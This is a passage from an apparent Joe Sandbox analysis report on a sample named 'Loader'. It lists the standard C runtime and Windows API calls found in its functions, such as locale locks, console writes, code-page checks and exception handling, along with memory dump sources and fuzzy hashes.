                                                                                                  • Associated: 00000003.00000002.2234677127.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234715540.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234735490.0000000000A9A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234750484.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234764781.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234796994.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                  • String ID:
                                                                                                  • API String ID: 158306478-0
                                                                                                  • Opcode ID: 9a37f0a1ffadcf76fd061f04b21aff88caf6e94ba6aa8790b06e4fc169ef8430
                                                                                                  • Instruction ID: ec1fd254cad5b85a14ca9e709afa38019965317abf40ac1e68b9277712781818
                                                                                                  • Opcode Fuzzy Hash: 9a37f0a1ffadcf76fd061f04b21aff88caf6e94ba6aa8790b06e4fc169ef8430
                                                                                                  • Instruction Fuzzy Hash: B711D2F2A025197EAB2137B69D8ADFF6A6CDEA5B947108025FA05D1100FF64DF0182B1
                                                                                                  APIs
                                                                                                  • __EH_prolog3.LIBCMT ref: 00A6E899
                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00A6E8A3
                                                                                                  • int.LIBCPMT ref: 00A6E8BA
                                                                                                    • Part of subcall function 00A6C1E5: std::_Lockit::_Lockit.LIBCPMT ref: 00A6C1F6
                                                                                                    • Part of subcall function 00A6C1E5: std::_Lockit::~_Lockit.LIBCPMT ref: 00A6C210
                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00A6E914
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234694107.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2234677127.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234715540.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234735490.0000000000A9A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234750484.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234764781.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234796994.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
                                                                                                  • String ID:
                                                                                                  • API String ID: 1383202999-0
                                                                                                  • Opcode ID: eac22b5fe8e8e63d99b39b6309b85145b99bb2603a2f3c6ad8da17ff56e51bc3
                                                                                                  • Instruction ID: eb02c8ed2b923fd73248b20435ec8ca557fe320b61752efea3f610d6c79af024
                                                                                                  • Opcode Fuzzy Hash: eac22b5fe8e8e63d99b39b6309b85145b99bb2603a2f3c6ad8da17ff56e51bc3
                                                                                                  • Instruction Fuzzy Hash: FF11C036A001199FCF05EBB4DA55ABDBBB1AF94724F250119F411AB2D2CF749E01CF91
                                                                                                  APIs
                                                                                                  • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00A8A2EF,00000000,00000001,00000000,?,?,00A84390,?,00000000,00000000), ref: 00A8ADB7
                                                                                                  • GetLastError.KERNEL32(?,00A8A2EF,00000000,00000001,00000000,?,?,00A84390,?,00000000,00000000,?,?,?,00A83CD6,00000000), ref: 00A8ADC3
                                                                                                    • Part of subcall function 00A8AE20: CloseHandle.KERNEL32(FFFFFFFE,00A8ADD3,?,00A8A2EF,00000000,00000001,00000000,?,?,00A84390,?,00000000,00000000,?,?), ref: 00A8AE30
                                                                                                  • ___initconout.LIBCMT ref: 00A8ADD3
                                                                                                    • Part of subcall function 00A8ADF5: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00A8AD91,00A8A2DC,?,?,00A84390,?,00000000,00000000,?), ref: 00A8AE08
                                                                                                  • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,00A8A2EF,00000000,00000001,00000000,?,?,00A84390,?,00000000,00000000,?), ref: 00A8ADE8
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234694107.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2234677127.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234715540.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234735490.0000000000A9A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234750484.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234764781.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234796994.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                  • String ID:
                                                                                                  • API String ID: 2744216297-0
                                                                                                  • Opcode ID: 50db343071c7fc3c48a0a066a4e5ade8fa50e5af813dafb6a49baa4af7468404
                                                                                                  • Instruction ID: d94a48af51fb2dcc5e2f3c9d4955b1ddf7624fe5f50f9c613b67ffc49b3fc1e6
                                                                                                  • Opcode Fuzzy Hash: 50db343071c7fc3c48a0a066a4e5ade8fa50e5af813dafb6a49baa4af7468404
                                                                                                  • Instruction Fuzzy Hash: 6BF0A536604529BBDF226FD5DC08A9A7F66FF587B2B044013FA1996120DB328861AB91
                                                                                                  APIs
                                                                                                  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00A70507
                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00A70516
                                                                                                  • GetCurrentProcessId.KERNEL32 ref: 00A7051F
                                                                                                  • QueryPerformanceCounter.KERNEL32(?), ref: 00A7052C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234694107.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2234677127.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234715540.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234735490.0000000000A9A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234750484.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234764781.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234796994.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 2933794660-0
                                                                                                  • Opcode ID: 5f9371ace77956c688fff65c05458b9a6b9de34c1106a434ea9f81869c924124
                                                                                                  • Instruction ID: 8469ece2d0871438aa6edb57d630cdbd0dadf4673bc1d9f1ba49452bfe42fd1f
                                                                                                  • Opcode Fuzzy Hash: 5f9371ace77956c688fff65c05458b9a6b9de34c1106a434ea9f81869c924124
                                                                                                  • Instruction Fuzzy Hash: 38F05F74E1020DEBCB00DBF5DA4999EBBF4FF1C200B914996A412E6110EA30AA45DB50
                                                                                                  APIs
                                                                                                    • Part of subcall function 00A7C16A: GetLastError.KERNEL32(00000000,?,00A7E58D), ref: 00A7C16E
                                                                                                    • Part of subcall function 00A7C16A: SetLastError.KERNEL32(00000000,?,?,00000028,00A78363), ref: 00A7C210
                                                                                                  • GetACP.KERNEL32(-00000002,00000000,?,00000000,00000000,?,00A75BD5,?,?,?,00000055,?,-00000050,?,?,?), ref: 00A80A35
                                                                                                  • IsValidCodePage.KERNEL32(00000000,-00000002,00000000,?,00000000,00000000,?,00A75BD5,?,?,?,00000055,?,-00000050,?,?), ref: 00A80A6C
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234694107.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2234677127.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234715540.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234735490.0000000000A9A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234750484.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234764781.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234796994.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast$CodePageValid
                                                                                                  • String ID: utf8
                                                                                                  • API String ID: 943130320-905460609
                                                                                                  • Opcode ID: 83488d0207aea6c0acdd52cd82e8567e7265b057c1895c1eb0027fd19d2792f3
                                                                                                  • Instruction ID: c5c65cec8a08501ec86d1d760e3931a4b1265349abe8ce7d1aaf1c95ba1446d4
                                                                                                  • Opcode Fuzzy Hash: 83488d0207aea6c0acdd52cd82e8567e7265b057c1895c1eb0027fd19d2792f3
                                                                                                  • Instruction Fuzzy Hash: D4513771B00705AADB69BB74CD86FBBB3A8EF05744F044429F55A97082FB70ED4887A1
                                                                                                  APIs
                                                                                                  • Concurrency::details::_Release_chore.LIBCPMT ref: 00A67526
                                                                                                  • ___std_exception_copy.LIBVCRUNTIME ref: 00A67561
                                                                                                    • Part of subcall function 00A6AF37: CreateThreadpoolWork.KERNEL32(00A6B060,00A68A2A,00000000), ref: 00A6AF46
                                                                                                    • Part of subcall function 00A6AF37: Concurrency::details::_Reschedule_chore.LIBCPMT ref: 00A6AF53
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234694107.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2234677127.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234715540.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234735490.0000000000A9A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234750484.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234764781.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234796994.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Concurrency::details::_$CreateRelease_choreReschedule_choreThreadpoolWork___std_exception_copy
                                                                                                  • String ID: Fail to schedule the chore!
                                                                                                  • API String ID: 3683891980-3313369819
                                                                                                  • Opcode ID: 32e74f2deeb70f2926663d905820ed052dfd025e0a99b1ca28521aa8fa816879
                                                                                                  • Instruction ID: 02a0198b4016e901bf496ac898986edc6286690ee001938c909b39217255fe68
                                                                                                  • Opcode Fuzzy Hash: 32e74f2deeb70f2926663d905820ed052dfd025e0a99b1ca28521aa8fa816879
                                                                                                  • Instruction Fuzzy Hash: F9519EB4A10218DFCF00DF94D948BAEBBB1FF08324F144129E81AAB391DB75A905CF91
                                                                                                  APIs
                                                                                                  • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,00A7B893,?,?,00000000,00000000,00000000,?), ref: 00A7B9B7
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234694107.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2234677127.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234715540.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234735490.0000000000A9A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234750484.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234764781.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234796994.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: EncodePointer
                                                                                                  • String ID: MOC$RCC
                                                                                                  • API String ID: 2118026453-2084237596
                                                                                                  • Opcode ID: 98042c4d0a6a099a3bc8f5ad181ad9ce4a4796c1cac9fb672dc112b4dee0acf8
                                                                                                  • Instruction ID: d88288f33cc8fd44ce8738fca6342a4bbaeeb11bfe704af8befc82f9ce09302a
                                                                                                  • Opcode Fuzzy Hash: 98042c4d0a6a099a3bc8f5ad181ad9ce4a4796c1cac9fb672dc112b4dee0acf8
                                                                                                  • Instruction Fuzzy Hash: F94148B2900209EFCF16DF98CD81AAEBBB5BF48340F18C199FA18A7211D3359950DB61
                                                                                                  APIs
                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00A63EC6
                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00A64002
                                                                                                    • Part of subcall function 00A6ABC5: _Yarn.LIBCPMT ref: 00A6ABE5
                                                                                                    • Part of subcall function 00A6ABC5: _Yarn.LIBCPMT ref: 00A6AC09
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234694107.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2234677127.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234715540.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234735490.0000000000A9A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234750484.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234764781.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234796994.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: LockitYarnstd::_$Lockit::_Lockit::~_
                                                                                                  • String ID: bad locale name
                                                                                                  • API String ID: 2070049627-1405518554
                                                                                                  • Opcode ID: b1c63ae8f290af117b16d9d1fc086f2e9bd2224b73023d0969e48b984c365305
                                                                                                  • Instruction ID: 2b77fc916c62b8e3ff9a9f8a59e32dc08e450454c8de153ef27cc4d4fbca1c6d
                                                                                                  • Opcode Fuzzy Hash: b1c63ae8f290af117b16d9d1fc086f2e9bd2224b73023d0969e48b984c365305
                                                                                                  • Instruction Fuzzy Hash: 9E418FF1A007459BEB10EF69C905B57BBF8BF04714F044629E4099B781E77AE518CBE1
                                                                                                  APIs
                                                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 00A7B475
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234694107.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2234677127.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234715540.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234735490.0000000000A9A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234750484.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234764781.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234796994.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ___except_validate_context_record
                                                                                                  • String ID: csm$csm
                                                                                                  • API String ID: 3493665558-3733052814
                                                                                                  • Opcode ID: 63dc5954610c977c7637b053f87e59a7b947ba425931f4115fd3143ee7f7fbe0
                                                                                                  • Instruction ID: 5270dfc370027a0edac5da0e28ae1d9c1221e64e692c9fed6932fee5d586a612
                                                                                                  • Opcode Fuzzy Hash: 63dc5954610c977c7637b053f87e59a7b947ba425931f4115fd3143ee7f7fbe0
                                                                                                  • Instruction Fuzzy Hash: 4F3107F2420219EBCF228F51CC44AAA7B76FF08718B18C65AF84D49122C332DD61DBA1
                                                                                                  APIs
                                                                                                  • __alloca_probe_16.LIBCMT ref: 00A6B8B9
                                                                                                  • RaiseException.KERNEL32(?,?,?,?,?), ref: 00A6B8DE
                                                                                                    • Part of subcall function 00A7060C: RaiseException.KERNEL32(E06D7363,00000001,00000003,00A6F354,00000000,?,?,?,00A6F354,00A63D4A,00A9759C,00A63D4A), ref: 00A7066D
                                                                                                    • Part of subcall function 00A78353: IsProcessorFeaturePresent.KERNEL32(00000017,00A7378B,?,?,?,?,00000000,?,?,?,00A6B5AC,00A6B4E0,00000000,?,?,00A6B4E0), ref: 00A7836F
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234694107.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2234677127.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234715540.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234735490.0000000000A9A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234750484.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234764781.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234796994.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ExceptionRaise$FeaturePresentProcessor__alloca_probe_16
                                                                                                  • String ID: csm
                                                                                                  • API String ID: 1924019822-1018135373
                                                                                                  • Opcode ID: 6d11153da41881c63f3e543594392f4bb5736519afa37799bcd45869cec2c79b
                                                                                                  • Instruction ID: a0c841d329b6cf57befff0513035183101fbeae13c8d1e6c2652ffeb3931e870
                                                                                                  • Opcode Fuzzy Hash: 6d11153da41881c63f3e543594392f4bb5736519afa37799bcd45869cec2c79b
                                                                                                  • Instruction Fuzzy Hash: 1E21AC31E10218EBCF34EF99D945AEEB7BCAF40710F144419E506EB250CB70AD85CBA1
                                                                                                  APIs
                                                                                                  • ___std_exception_copy.LIBVCRUNTIME ref: 00A62673
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234694107.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2234677127.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234715540.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234735490.0000000000A9A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234750484.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234764781.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234796994.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ___std_exception_copy
                                                                                                  • String ID: bad array new length$ios_base::badbit set
                                                                                                  • API String ID: 2659868963-1158432155
                                                                                                  • Opcode ID: 143b623ce8dd4fc44d5d888def5996d9dee2419bdc227b1989af70e5c55c4ebf
                                                                                                  • Instruction ID: eb1d3eddb6a26f4e1fdb884c3f7256f063db4edbc3dc734d24ca8c7d07bd4f22
                                                                                                  • Opcode Fuzzy Hash: 143b623ce8dd4fc44d5d888def5996d9dee2419bdc227b1989af70e5c55c4ebf
                                                                                                  • Instruction Fuzzy Hash: E601BCB1614300ABDB04EF28D856A1A7BF4AF08318F01882DF45D9B341E775E804CB91
                                                                                                  APIs
                                                                                                    • Part of subcall function 00A7060C: RaiseException.KERNEL32(E06D7363,00000001,00000003,00A6F354,00000000,?,?,?,00A6F354,00A63D4A,00A9759C,00A63D4A), ref: 00A7066D
                                                                                                  • ___std_exception_copy.LIBVCRUNTIME ref: 00A62673
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2234694107.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2234677127.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234715540.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234735490.0000000000A9A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234750484.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234764781.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2234796994.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ExceptionRaise___std_exception_copy
                                                                                                  • String ID: bad array new length$ios_base::badbit set
                                                                                                  • API String ID: 3109751735-1158432155
                                                                                                  • Opcode ID: fb4a3dcc6ae9f260a011df3fd74b16d871091adf93b3cd61472f9f8c26350b46
                                                                                                  • Instruction ID: 5828b73985da4892474a2de5ce16a56f2e60418cf8dc1164ecf5716b6fe3a1f9
                                                                                                  • Opcode Fuzzy Hash: fb4a3dcc6ae9f260a011df3fd74b16d871091adf93b3cd61472f9f8c26350b46
                                                                                                  • Instruction Fuzzy Hash: 6FF0D4F1614300ABD700AF18DD49B4BBBF4AB48718F018C1DF5999B340D3B5E444CB92